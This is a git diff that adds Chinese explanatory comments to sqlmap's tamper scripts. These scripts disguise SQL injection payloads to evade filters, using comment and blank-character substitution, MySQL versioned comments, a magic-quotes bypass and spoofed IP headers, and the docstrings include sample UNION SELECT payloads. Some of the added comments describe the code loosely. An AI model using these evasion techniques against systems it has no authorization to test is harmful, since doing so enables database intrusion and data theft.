d23c0d5..30cc2bf 100644 --- a/src/sqlmap-master/tamper/sp_password.py +++ b/src/sqlmap-master/tamper/sp_password.py @@ -27,6 +27,9 @@ def tamper(payload, **kwargs): retVal = "" if payload: + # 构造返回的payload字符串 + # 如果payload中已经包含注释符号('#'或'--'),则直接添加sp_password函数 + # 否则,在sp_password前添加一个'-- '作为注释 retVal = "%s%ssp_password" % (payload, "-- " if not any(_ if _ in payload else None for _ in ('#', "-- ")) else "") return retVal diff --git a/src/sqlmap-master/tamper/space2comment.py b/src/sqlmap-master/tamper/space2comment.py index 3229a5c..231bb1b 100644 --- a/src/sqlmap-master/tamper/space2comment.py +++ b/src/sqlmap-master/tamper/space2comment.py @@ -4,7 +4,7 @@ Copyright (c) 2006-2024 sqlmap developers (https://sqlmap.org/) See the file 'LICENSE' for copying permission """ - +# 从sqlmap的库中导入兼容模块中的xrange函数和优先级枚举 from lib.core.compat import xrange from lib.core.enums import PRIORITY @@ -33,26 +33,28 @@ def tamper(payload, **kwargs): retVal = payload if payload: - retVal = "" + retVal = "" # 初始化引号状态标记 quote, doublequote, firstspace = False, False, False + # 遍历payload中的每个字符 for i in xrange(len(payload)): + # 如果是第一个空格且之前没有遇到过空格 if not firstspace: if payload[i].isspace(): firstspace = True retVal += "/**/" continue - + # 如果是单引号 elif payload[i] == '\'': quote = not quote - + # 如果是双引号 elif payload[i] == '"': doublequote = not doublequote - + # 如果是空格且之前没有遇到过双引号和单引号 elif payload[i] == " " and not doublequote and not quote: retVal += "/**/" continue - + # 添加当前字符到retVal retVal += payload[i] return retVal diff --git a/src/sqlmap-master/tamper/space2dash.py b/src/sqlmap-master/tamper/space2dash.py index 5ecb814..298d26f 100644 --- a/src/sqlmap-master/tamper/space2dash.py +++ b/src/sqlmap-master/tamper/space2dash.py @@ -8,6 +8,7 @@ See the file 'LICENSE' for copying permission import random import string +# 从sqlmap的库中导入兼容模块中的xrange函数和优先级枚举 from lib.core.compat import xrange from lib.core.enums import PRIORITY @@ -30,18 +31,29 @@ def tamper(payload, **kwargs): >>> tamper('1 AND 9227=9227') '1--upgPydUzKpMX%0AAND--RcDKhIr%0A9227=9227' """ - + retVal = "" if payload: + # 遍历payload中的每个字符 for i in xrange(len(payload)): - if payload[i].isspace(): + # 如果当前字符是空格 + if payload[i].isspace(): + # 生成一个随机字符串 randomStr = ''.join(random.choice(string.ascii_uppercase + string.ascii_lowercase) for _ in xrange(random.randint(6, 12))) + # 将随机字符串和换行符添加到retVal中 retVal += "--%s%%0A" % randomStr + + # 如果当前字符是#或者#后面跟着两个空格 + # 如果payload[i]等于#或者payload[i:i + 3]等于-- elif payload[i] == '#' or payload[i:i + 3] == '-- ': + # 将payload[i:]添加到retVal中 retVal += payload[i:] + # 跳出循环 break + # 否则,将payload[i]添加到retVal中 else: retVal += payload[i] + # 返回retVal return retVal diff --git a/src/sqlmap-master/tamper/space2hash.py b/src/sqlmap-master/tamper/space2hash.py index 2cef84d..348fd20 100644 --- a/src/sqlmap-master/tamper/space2hash.py +++ b/src/sqlmap-master/tamper/space2hash.py @@ -16,7 +16,9 @@ from lib.core.enums import PRIORITY __priority__ = PRIORITY.LOW +# 定义一个函数,用于检查脚本依赖 def dependencies(): + # 输出警告信息,提示脚本只能运行在MySQL数据库上 singleTimeWarnMessage("tamper script '%s' is only meant to be run against %s" % (os.path.basename(__file__).split(".")[0], DBMS.MYSQL)) def tamper(payload, **kwargs): @@ -41,15 +43,26 @@ def tamper(payload, **kwargs): retVal = "" + # 如果payload不为空 if payload: + # 遍历payload的每个字符 for i in xrange(len(payload)): + # 如果字符是空格 if payload[i].isspace(): + # 生成一个随机字符串 randomStr = ''.join(random.choice(string.ascii_uppercase + string.ascii_lowercase) for _ in xrange(random.randint(6, 12))) + # 将随机字符串添加到retVal中 retVal += "%%23%s%%0A" % randomStr + # 如果字符是#或者字符是-- elif payload[i] == '#' or payload[i:i + 3] == '-- ': + # 将payload的剩余部分添加到retVal中 retVal += payload[i:] + # 跳出循环 break + # 否则 else: + # 将字符添加到retVal中 retVal += payload[i] + # 返回retVal return retVal diff --git a/src/sqlmap-master/tamper/space2morecomment.py b/src/sqlmap-master/tamper/space2morecomment.py index c5d7ec4..7cffc12 100644 --- a/src/sqlmap-master/tamper/space2morecomment.py +++ b/src/sqlmap-master/tamper/space2morecomment.py @@ -33,23 +33,29 @@ def tamper(payload, **kwargs): retVal = "" quote, doublequote, firstspace = False, False, False + # 遍历payload中的每个字符 for i in xrange(len(payload)): + # 如果第一个字符不是空格,则将firstspace设置为True,并将retVal添加"/**_**/" if not firstspace: if payload[i].isspace(): firstspace = True retVal += "/**_**/" continue + # 如果字符是单引号,则将quote取反 elif payload[i] == '\'': quote = not quote + # 如果字符是双引号,则将doublequote取反 elif payload[i] == '"': doublequote = not doublequote + # 如果字符是空格,且不是在双引号或单引号中,则将retVal添加"/**_**/" elif payload[i] == " " and not doublequote and not quote: retVal += "/**_**/" continue + # 将字符添加到retVal中 retVal += payload[i] return retVal diff --git a/src/sqlmap-master/tamper/space2morehash.py b/src/sqlmap-master/tamper/space2morehash.py index 091bb9b..8df3c21 100644 --- a/src/sqlmap-master/tamper/space2morehash.py +++ b/src/sqlmap-master/tamper/space2morehash.py @@ -20,6 +20,10 @@ from lib.core.settings import IGNORE_SPACE_AFFECTED_KEYWORDS __priority__ = PRIORITY.LOW def dependencies(): + """ + 检查是否满足脚本运行的条件 + """ + # 输出警告信息,提示tamper脚本只适用于MySQL版本大于5.1.13 singleTimeWarnMessage("tamper script '%s' is only meant to be run against %s > 5.1.13" % (os.path.basename(__file__).split(".")[0], DBMS.MYSQL)) def tamper(payload, **kwargs): @@ -43,9 +47,13 @@ def tamper(payload, **kwargs): """ def process(match): + """ + 处理匹配到的单词 + """ word = match.group('word') randomStr = ''.join(random.choice(string.ascii_uppercase + string.ascii_lowercase) for _ in xrange(random.randint(6, 12))) + # 如果匹配到的单词在关键词列表中,并且不在忽略空格影响的关键词列表中,则替换为随机字符串 if word.upper() in kb.keywords and word.upper() not in IGNORE_SPACE_AFFECTED_KEYWORDS: return match.group().replace(word, "%s%%23%s%%0A" % (word, randomStr)) else: @@ -53,16 +61,21 @@ def tamper(payload, **kwargs): retVal = "" + # 如果payload存在,则进行替换 if payload: payload = re.sub(r"(?<=\W)(?P[A-Za-z_]+)(?=\W|\Z)", process, payload) + # 遍历payload中的每个字符 for i in xrange(len(payload)): + # 如果字符是空格,则替换为随机字符串 if payload[i].isspace(): randomStr = ''.join(random.choice(string.ascii_uppercase + string.ascii_lowercase) for _ in xrange(random.randint(6, 12))) retVal += "%%23%s%%0A" % randomStr + # 如果字符是#或者字符是--,则将payload中剩余的字符添加到retVal中,并跳出循环 elif payload[i] == '#' or payload[i:i + 3] == '-- ': retVal += payload[i:] break + # 否则将字符添加到retVal中 else: retVal += payload[i] diff --git a/src/sqlmap-master/tamper/space2mssqlblank.py b/src/sqlmap-master/tamper/space2mssqlblank.py index 5f055c8..7055f60 100644 --- a/src/sqlmap-master/tamper/space2mssqlblank.py +++ b/src/sqlmap-master/tamper/space2mssqlblank.py @@ -8,14 +8,20 @@ See the file 'LICENSE' for copying permission import os import random +# 导入lib.core.common模块中的singleTimeWarnMessage函数 from lib.core.common import singleTimeWarnMessage +# 导入lib.core.compat模块中的xrange函数 from lib.core.compat import xrange +# 导入lib.core.enums模块中的DBMS枚举 from lib.core.enums import DBMS +# 导入lib.core.enums模块中的PRIORITY枚举 from lib.core.enums import PRIORITY __priority__ = PRIORITY.LOW +# 定义一个函数,用于检查脚本依赖 def dependencies(): + # 输出警告信息,说明该脚本只能用于特定数据库 singleTimeWarnMessage("tamper script '%s' is only meant to be run against %s" % (os.path.basename(__file__).split(".")[0], DBMS.MSSQL)) def tamper(payload, **kwargs): @@ -53,29 +59,38 @@ def tamper(payload, **kwargs): # CR 0D carriage return # SO 0E shift out # SI 0F shift in + # 定义一个元组,包含一些字符串 blanks = ('%01', '%02', '%03', '%04', '%05', '%06', '%07', '%08', '%09', '%0B', '%0C', '%0D', '%0E', '%0F', '%0A') + # 将payload赋值给retVal retVal = payload if payload: retVal = "" quote, doublequote, firstspace, end = False, False, False, False + # 遍历payload中的每个字符 for i in xrange(len(payload)): + # 如果当前字符不是空格,则将firstspace设置为True if not firstspace: if payload[i].isspace(): firstspace = True + # 在retVal中添加一个随机选择的空格 retVal += random.choice(blanks) continue + # 如果当前字符是单引号,则将quote取反 elif payload[i] == '\'': quote = not quote + # 如果当前字符是双引号,则将doublequote取反 elif payload[i] == '"': doublequote = not doublequote + # 如果当前字符是#或者--,则将end设置为True elif payload[i] == '#' or payload[i:i + 3] == '-- ': end = True + # 如果当前字符是空格,且不是在双引号或单引号中,则根据end的值添加一个随机选择的空格 elif payload[i] == " " and not doublequote and not quote: if end: retVal += random.choice(blanks[:-1]) @@ -84,6 +99,7 @@ def tamper(payload, **kwargs): continue + # 将当前字符添加到retVal中 retVal += payload[i] return retVal diff --git a/src/sqlmap-master/tamper/space2mssqlhash.py b/src/sqlmap-master/tamper/space2mssqlhash.py index 67e31e6..64788a8 100644 --- a/src/sqlmap-master/tamper/space2mssqlhash.py +++ b/src/sqlmap-master/tamper/space2mssqlhash.py @@ -27,14 +27,24 @@ def tamper(payload, **kwargs): retVal = "" + # 如果payload不为空 if payload: + # 遍历payload的每个字符 for i in xrange(len(payload)): + # 如果字符是空格 if payload[i].isspace(): + # 将%23%0A添加到retVal中 retVal += "%23%0A" + # 如果字符是#或者字符是-- elif payload[i] == '#' or payload[i:i + 3] == '-- ': + # 将payload的剩余部分添加到retVal中 retVal += payload[i:] + # 跳出循环 break + # 否则 else: + # 将字符添加到retVal中 retVal += payload[i] + # 返回retVal return retVal diff --git a/src/sqlmap-master/tamper/space2mysqlblank.py b/src/sqlmap-master/tamper/space2mysqlblank.py index 399370c..ef81d36 100644 --- a/src/sqlmap-master/tamper/space2mysqlblank.py +++ b/src/sqlmap-master/tamper/space2mysqlblank.py @@ -43,30 +43,50 @@ def tamper(payload, **kwargs): # CR 0D carriage return # VT 0B vertical TAB (MySQL and Microsoft SQL Server only) # A0 non-breaking space + # 定义一个包含特殊字符的元组 blanks = ('%09', '%0A', '%0C', '%0D', '%0B', '%A0') + # 将payload赋值给retVal retVal = payload + # 如果payload不为空 if payload: + # 将retVal置为空字符串 retVal = "" + # 定义三个布尔变量,分别表示是否在引号内、双引号内和第一个空格 quote, doublequote, firstspace = False, False, False + # 遍历payload的每个字符 for i in xrange(len(payload)): + # 如果第一个空格为假 if not firstspace: + # 如果当前字符是空格 if payload[i].isspace(): + # 将第一个空格置为真 firstspace = True + # 将一个随机选择的特殊字符添加到retVal中 retVal += random.choice(blanks) + # 继续下一次循环 continue + # 如果当前字符是单引号 elif payload[i] == '\'': + # 将quote取反 quote = not quote + # 如果当前字符是双引号 elif payload[i] == '"': + # 将doublequote取反 doublequote = not doublequote + # 如果当前字符是空格,且不在双引号内和单引号内 elif payload[i] == " " and not doublequote and not quote: + # 将一个随机选择的特殊字符添加到retVal中 retVal += random.choice(blanks) + # 继续下一次循环 continue + # 将当前字符添加到retVal中 retVal += payload[i] + # 返回retVal return retVal diff --git a/src/sqlmap-master/tamper/space2mysqldash.py b/src/sqlmap-master/tamper/space2mysqldash.py index 7b64776..deffbff 100644 --- a/src/sqlmap-master/tamper/space2mysqldash.py +++ b/src/sqlmap-master/tamper/space2mysqldash.py @@ -7,14 +7,20 @@ See the file 'LICENSE' for copying permission import os +# 从lib.core.common模块中导入singleTimeWarnMessage函数 from lib.core.common import singleTimeWarnMessage +# 从lib.core.compat模块中导入xrange函数 from lib.core.compat import xrange +# 从lib.core.enums模块中导入DBMS枚举和PRIORITY枚举 from lib.core.enums import DBMS from lib.core.enums import PRIORITY +# 设置脚本的优先级为LOW __priority__ = PRIORITY.LOW +# 定义dependencies函数,用于检查脚本依赖 def dependencies(): + # 输出警告信息,说明该脚本只能用于MySQL数据库 singleTimeWarnMessage("tamper script '%s' is only meant to be run against %s" % (os.path.basename(__file__).split(".")[0], DBMS.MYSQL)) def tamper(payload, **kwargs): @@ -34,14 +40,24 @@ def tamper(payload, **kwargs): retVal = "" + # 如果payload不为空 if payload: + # 遍历payload的每个字符 for i in xrange(len(payload)): + # 如果字符是空格 if payload[i].isspace(): + # 将"--%0A"添加到retVal中 retVal += "--%0A" + # 如果字符是#或者字符是-- elif payload[i] == '#' or payload[i:i + 3] == '-- ': + # 将payload的剩余部分添加到retVal中 retVal += payload[i:] + # 跳出循环 break + # 否则 else: + # 将字符添加到retVal中 retVal += payload[i] + # 返回retVal return retVal diff --git a/src/sqlmap-master/tamper/space2plus.py b/src/sqlmap-master/tamper/space2plus.py index 45110ae..88a338d 100644 --- a/src/sqlmap-master/tamper/space2plus.py +++ b/src/sqlmap-master/tamper/space2plus.py @@ -5,11 +5,14 @@ Copyright (c) 2006-2024 sqlmap developers (https://sqlmap.org/) See the file 'LICENSE' for copying permission """ +# 导入xrange和PRIORITY from lib.core.compat import xrange from lib.core.enums import PRIORITY +# 定义优先级为LOW __priority__ = PRIORITY.LOW +# 定义依赖函数 def dependencies(): pass @@ -27,27 +30,35 @@ def tamper(payload, **kwargs): retVal = payload + # 如果payload不为空 if payload: retVal = "" quote, doublequote, firstspace = False, False, False + # 遍历payload的每个字符 for i in xrange(len(payload)): + # 如果第一个字符不是空格 if not firstspace: + # 如果当前字符是空格 if payload[i].isspace(): firstspace = True retVal += "+" continue + # 如果当前字符是单引号 elif payload[i] == '\'': quote = not quote + # 如果当前字符是双引号 elif payload[i] == '"': doublequote = not doublequote + # 如果当前字符是空格,并且不在双引号和单引号中 elif payload[i] == " " and not doublequote and not quote: retVal += "+" continue + # 将当前字符添加到retVal中 retVal += payload[i] return retVal diff --git a/src/sqlmap-master/tamper/space2randomblank.py b/src/sqlmap-master/tamper/space2randomblank.py index 2a2cc4d..cac06ad 100644 --- a/src/sqlmap-master/tamper/space2randomblank.py +++ b/src/sqlmap-master/tamper/space2randomblank.py @@ -38,30 +38,50 @@ def tamper(payload, **kwargs): # LF 0A new line # FF 0C new page # CR 0D carriage return + # 定义一个包含特殊字符的列表 blanks = ("%09", "%0A", "%0C", "%0D") + # 将payload赋值给retVal retVal = payload + # 如果payload不为空 if payload: + # 将retVal置为空字符串 retVal = "" + # 定义三个布尔变量,分别表示是否在引号内、双引号内和第一个空格 quote, doublequote, firstspace = False, False, False + # 遍历payload的每个字符 for i in xrange(len(payload)): + # 如果第一个字符不是空格 if not firstspace: + # 如果当前字符是空格 if payload[i].isspace(): + # 将firstspace置为True firstspace = True + # 在retVal中添加一个随机选择的特殊字符 retVal += random.choice(blanks) + # 继续下一次循环 continue + # 如果当前字符是单引号 elif payload[i] == '\'': + # 将quote取反 quote = not quote + # 如果当前字符是双引号 elif payload[i] == '"': + # 将doublequote取反 doublequote = not doublequote + # 如果当前字符是空格,且不在双引号和单引号内 elif payload[i] == ' ' and not doublequote and not quote: + # 在retVal中添加一个随机选择的特殊字符 retVal += random.choice(blanks) + # 继续下一次循环 continue + # 将当前字符添加到retVal中 retVal += payload[i] + # 返回retVal return retVal diff --git a/src/sqlmap-master/tamper/substring2leftright.py b/src/sqlmap-master/tamper/substring2leftright.py index 642e499..d993050 100644 --- a/src/sqlmap-master/tamper/substring2leftright.py +++ b/src/sqlmap-master/tamper/substring2leftright.py @@ -32,16 +32,26 @@ def tamper(payload, **kwargs): retVal = payload + # 如果payload不为空 if payload: + # 在payload中查找SUBSTRING函数 match = re.search(r"SUBSTRING\((.+?)\s+FROM[^)]+(\d+)[^)]+FOR[^)]+1\)", payload) + # 如果找到了SUBSTRING函数 if match: + # 获取SUBSTRING函数中的位置参数 pos = int(match.group(2)) + # 如果位置参数为1 if pos == 1: + # 将SUBSTRING函数替换为LEFT函数 _ = "LEFT(%s,1)" % (match.group(1)) + # 否则 else: + # 将SUBSTRING函数替换为RIGHT和LEFT函数的组合 _ = "LEFT(RIGHT(%s,%d),1)" % (match.group(1), 1 - pos) + # 将替换后的函数替换回payload中 retVal = retVal.replace(match.group(0), _) + # 返回替换后的payload return retVal diff --git a/src/sqlmap-master/tamper/symboliclogical.py b/src/sqlmap-master/tamper/symboliclogical.py index f33e09c..8cc03e0 100644 --- a/src/sqlmap-master/tamper/symboliclogical.py +++ b/src/sqlmap-master/tamper/symboliclogical.py @@ -5,12 +5,16 @@ Copyright (c) 2006-2024 sqlmap developers (https://sqlmap.org/) See the file 'LICENSE' for copying permission """ +# 导入正则表达式模块 import re +# 从lib.core.enums模块中导入PRIORITY枚举 from lib.core.enums import PRIORITY +# 定义最低优先级 __priority__ = PRIORITY.LOWEST +# 定义依赖函数 def dependencies(): pass @@ -24,6 +28,7 @@ def tamper(payload, **kwargs): retVal = payload + # 如果payload不为空,则将payload中的AND替换为%26%26,将OR替换为%7C%7C if payload: retVal = re.sub(r"(?i)\bAND\b", "%26%26", re.sub(r"(?i)\bOR\b", "%7C%7C", payload)) diff --git a/src/sqlmap-master/tamper/unionalltounion.py b/src/sqlmap-master/tamper/unionalltounion.py index 1c1ae21..d56b8a3 100644 --- a/src/sqlmap-master/tamper/unionalltounion.py +++ b/src/sqlmap-master/tamper/unionalltounion.py @@ -7,11 +7,14 @@ See the file 'LICENSE' for copying permission from lib.core.enums import PRIORITY +# 设置优先级为最高 __priority__ = PRIORITY.HIGHEST +# 定义依赖函数 def dependencies(): pass +# 定义tamper函数,用于替换payload中的UNION ALL SELECT为UNION SELECT def tamper(payload, **kwargs): """ Replaces instances of UNION ALL SELECT with UNION SELECT counterpart @@ -20,4 +23,5 @@ def tamper(payload, **kwargs): '-1 UNION SELECT' """ + # 如果payload存在,则替换其中的UNION ALL SELECT为UNION SELECT return payload.replace("UNION ALL SELECT", "UNION SELECT") if payload else payload diff --git a/src/sqlmap-master/tamper/unmagicquotes.py b/src/sqlmap-master/tamper/unmagicquotes.py index 89e9b96..6e19576 100644 --- a/src/sqlmap-master/tamper/unmagicquotes.py +++ b/src/sqlmap-master/tamper/unmagicquotes.py @@ -31,23 +31,38 @@ def tamper(payload, **kwargs): retVal = payload + # 如果payload不为空 if payload: found = False retVal = "" + # 遍历payload中的每个字符 for i in xrange(len(payload)): + # 如果字符为单引号且found为False if payload[i] == '\'' and not found: + # 将%bf%27添加到retVal中 retVal += "%bf%27" + # 将found设置为True found = True else: + # 将字符添加到retVal中 retVal += payload[i] + # 继续循环 continue + # 如果found为True if found: + # 使用正则表达式替换retVal中的内容 _ = re.sub(r"(?i)\s*(AND|OR)[\s(]+([^\s]+)\s*(=|LIKE)\s*\2", "", retVal) + # 如果替换后的内容与retVal不同 if _ != retVal: + # 将替换后的内容赋值给retVal retVal = _ + # 将-- -添加到retVal中 retVal += "-- -" + # 如果retVal中不包含#、--、/*中的任意一个 elif not any(_ in retVal for _ in ('#', '--', '/*')): + # 将-- -添加到retVal中 retVal += "-- -" + # 返回retVal return retVal diff --git a/src/sqlmap-master/tamper/uppercase.py b/src/sqlmap-master/tamper/uppercase.py index ad27404..5e223bc 100644 --- a/src/sqlmap-master/tamper/uppercase.py +++ b/src/sqlmap-master/tamper/uppercase.py @@ -36,11 +36,17 @@ def tamper(payload, **kwargs): retVal = payload + # 如果payload不为空 if payload: + # 在retVal中查找所有匹配[A-Za-z_]的正则表达式 for match in re.finditer(r"[A-Za-z_]+", retVal): + # 获取匹配的单词 word = match.group() + # 如果单词的大写形式在kb.keywords中 if word.upper() in kb.keywords: + # 将retVal中的单词替换为大写形式 retVal = retVal.replace(word, word.upper()) + # 返回retVal return retVal diff --git a/src/sqlmap-master/tamper/varnish.py b/src/sqlmap-master/tamper/varnish.py index 0e0add6..a0e8cae 100644 --- a/src/sqlmap-master/tamper/varnish.py +++ b/src/sqlmap-master/tamper/varnish.py @@ -28,6 +28,9 @@ def tamper(payload, **kwargs): >> X-remote-IP: * or %00 or %0A """ + # 获取kwargs字典中的headers键对应的值,如果不存在则返回空字典 headers = kwargs.get("headers", {}) + # 在headers字典中添加X-originating-IP键,值为127.0.0.1 headers["X-originating-IP"] = "127.0.0.1" + # 返回payload return payload diff --git a/src/sqlmap-master/tamper/versionedkeywords.py b/src/sqlmap-master/tamper/versionedkeywords.py index 6914ade..6a8781b 100644 --- a/src/sqlmap-master/tamper/versionedkeywords.py +++ b/src/sqlmap-master/tamper/versionedkeywords.py @@ -36,17 +36,26 @@ def tamper(payload, **kwargs): '1/*!UNION*//*!ALL*//*!SELECT*//*!NULL*/,/*!NULL*/, CONCAT(CHAR(58,104,116,116,58),IFNULL(CAST(CURRENT_USER()/*!AS*//*!CHAR*/),CHAR(32)),CHAR(58,100,114,117,58))#' """ + # 定义一个函数,用于处理匹配到的单词 def process(match): + # 获取匹配到的单词 word = match.group('word') + # 如果单词的大写形式在关键词列表中 if word.upper() in kb.keywords: + # 将匹配到的单词替换为/*!单词*/ return match.group().replace(word, "/*!%s*/" % word) else: + # 否则,返回匹配到的单词 return match.group() + # 将payload赋值给retVal retVal = payload + # 如果payload不为空 if payload: + # 使用正则表达式匹配单词,并调用process函数进行处理 retVal = re.sub(r"(?<=\W)(?P[A-Za-z_]+)(?=[^\w(]|\Z)", process, retVal) + # 将" /*!"替换为"/*!",将"*/ "替换为"*/" retVal = retVal.replace(" /*!", "/*!").replace("*/ ", "*/") return retVal diff --git a/src/sqlmap-master/tamper/versionedmorekeywords.py b/src/sqlmap-master/tamper/versionedmorekeywords.py index fe3480e..b160406 100644 --- a/src/sqlmap-master/tamper/versionedmorekeywords.py +++ b/src/sqlmap-master/tamper/versionedmorekeywords.py @@ -37,17 +37,27 @@ def tamper(payload, **kwargs): '1/*!UNION*//*!ALL*//*!SELECT*//*!NULL*/,/*!NULL*/,/*!CONCAT*/(/*!CHAR*/(58,122,114,115,58),/*!IFNULL*/(CAST(/*!CURRENT_USER*/()/*!AS*//*!CHAR*/),/*!CHAR*/(32)),/*!CHAR*/(58,115,114,121,58))#' """ + # 定义一个函数,用于处理匹配到的单词 def process(match): + # 获取匹配到的单词 word = match.group('word') + # 如果单词的大写形式在关键词列表中,并且不在忽略空格影响的关键词列表中 if word.upper() in kb.keywords and word.upper() not in IGNORE_SPACE_AFFECTED_KEYWORDS: + # 将匹配到的单词替换为/*!单词*/ return match.group().replace(word, "/*!%s*/" % word) else: + # 否则,返回匹配到的单词 return match.group() + # 将payload赋值给retVal retVal = payload + # 如果payload不为空 if payload: + # 使用正则表达式匹配单词,并调用process函数进行处理 retVal = re.sub(r"(?<=\W)(?P[A-Za-z_]+)(?=\W|\Z)", process, retVal) + # 将" /*!"替换为"/*!",将"*/ "替换为"*/" retVal = retVal.replace(" /*!", "/*!").replace("*/ ", "*/") + # 返回retVal return retVal diff --git a/src/sqlmap-master/tamper/xforwardedfor.py b/src/sqlmap-master/tamper/xforwardedfor.py index b1d2892..a222dbc 100644 --- a/src/sqlmap-master/tamper/xforwardedfor.py +++ b/src/sqlmap-master/tamper/xforwardedfor.py @@ -16,11 +16,16 @@ def dependencies(): pass def randomIP(): + """ + 生成一个随机的IP地址 + """ octets = [] + # 生成一个随机的IP地址,排除10.0.0.0/8, 172.16.0.0/12, 192.168.0.0/16这三个私有IP地址段 while not octets or octets[0] in (10, 172, 192): octets = random.sample(xrange(1, 255), 4) + # 将生成的IP地址段连接成一个字符串 return '.'.join(str(_) for _ in octets) def tamper(payload, **kwargs): @@ -28,7 +33,9 @@ def tamper(payload, **kwargs): Append a fake HTTP header 'X-Forwarded-For' (and alike) """ + # 获取传入的headers参数,如果没有则创建一个空字典 headers = kwargs.get("headers", {}) + # 生成一个随机的IP地址,并将其添加到headers中 headers["X-Forwarded-For"] = randomIP() headers["X-Client-Ip"] = randomIP() headers["X-Real-Ip"] = randomIP() @@ -36,9 +43,12 @@ def tamper(payload, **kwargs): headers["True-Client-IP"] = randomIP() # Reference: https://developer.chrome.com/multidevice/data-compression-for-isps#proxy-connection + # 添加一个Via头,表示通过Chrome Compression Proxy代理 headers["Via"] = "1.1 Chrome-Compression-Proxy" # Reference: https://wordpress.org/support/topic/blocked-country-gaining-access-via-cloudflare/#post-9812007 + # 添加一个CF-IPCountry头,表示通过Cloudflare代理,并随机选择一个国家 headers["CF-IPCountry"] = random.sample(('GB', 'US', 'FR', 'AU', 'CA', 'NZ', 'BE', 'DK', 'FI', 'IE', 'AT', 'IT', 'LU', 'NL', 'NO', 'PT', 'SE', 'ES', 'CH'), 1)[0] + # 返回添加了headers的payload return payload